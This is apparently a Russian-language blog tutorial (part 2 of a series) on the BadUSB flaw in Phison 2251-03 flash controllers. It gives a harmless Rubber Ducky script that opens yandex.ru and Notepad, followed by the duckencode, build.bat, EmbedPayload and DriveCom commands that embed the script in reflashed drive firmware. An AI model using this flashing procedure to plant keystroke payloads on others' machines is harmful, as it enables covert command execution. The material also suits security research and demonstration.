Уязвимость BadUSB для Phison 2251-03 (часть 2)

4. Запуск демо 1 (HID Payload)


Сценарии команд Rubber Ducky для использования в Duckencoder и создания inject.bin

Скачиваем любой скрипт или пишем свой github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
Сохраняем в C:\fw\ducky\hello_world.txt или ваше название на ваш вкус.


Делаем сценарий открывающий в браузере yandex.ru
затем нажимает кнопку F11 на полноэкранный режим
затем открывает блокнот и пишет туда Hello!!!
DELAY 5000
GUI r
DELAY 50
STRING http://yandex.ru
ENTER
DELAY 1000
F11
DELAY 3000
GUI R
DELAY 200
STRING notepad
ENTER
DELAY 200
STRING Hello!!!
ENTER


-i — путь к вашему сценарию
-o — путь куда сохранять сценарий для прошивки и его название

java -jar C:\fw\ducky\duckencode.jar -i C:\fw\ducky\hello_world.txt -o C:\fw\ducky\inject.bin



Для внедрения inject.bin нам надо создать саму прошивку
Идем в директорию C:\fw\Psychson-master\firmware
и запускаем build.bat


и создастся директория C:\fw\Psychson-master\firmware\bin
в которой будет наша прошивка fw.bin



Внедряем HID Payload в прошивку:

C:\fw\Psychson-master\tools\EmbedPayload.exe C:\fw\ducky\inject.bin C:\fw\Psychson-master\firmware\bin\fw.bin



Переводим флешку в boot-режим:
C:\fw\Psychson-master\tools\DriveCom.exe /drive=F /action=SetBootMode


Зашиваю прошивку с внедренным HID Payload:
C:\fw\Psychson-master\tools\DriveCom.exe /drive=F /action=SendFirmware /burner=C:\fw\fw_bn\BN03V114M.BIN /firmware=C:\fw\Psychson-master\firmware\bin\fw.bin



5. Запуск Демо 2 (скрытый раздел Patch)


6. Запуск Демо 3 (Password Patch)



Продолжение:
BadUSB для Phison 2251-03 (часть 1)
BadUSB для Phison 2251-03 Payload (часть 2)
BadUSB для Phison 2251-03 ошибки (часть 3)
BadUSB для Phison 2251-03 восстановление (часть 4)

Нет комментариев